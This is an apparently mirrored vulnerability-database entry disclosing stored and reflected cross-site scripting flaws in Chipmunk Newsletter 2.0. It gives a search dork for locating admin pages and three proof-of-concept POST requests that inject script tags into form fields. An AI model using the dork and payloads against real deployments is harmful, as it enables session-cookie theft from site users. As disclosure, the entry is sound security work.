Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1059055 漏洞类型
发布时间 2010-01-20 更新时间 2010-01-20
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/33967
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/40024/info

Chipmunk Newsletter is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Chipmunk Newsletter 2.0 is vulnerable; other versions may also be affected. 

::[ inurl:admin/login.php "Registering Admin" ]::



1 - http://localhost/sub.php

POSTDATA:
email=<script>alert('xss')</script>&choice=sub&lists=1&submit=submit



2 - http://localhost/admin/addaddress.php

POSTDATA:
email=<script>alert('xss')</script>&lists=1&submit=submit


then we can check it...



http://localhost/admin/searchaddress.php

POSTDATA:
theaddress=<script>alert('xss')</script>&submit=submit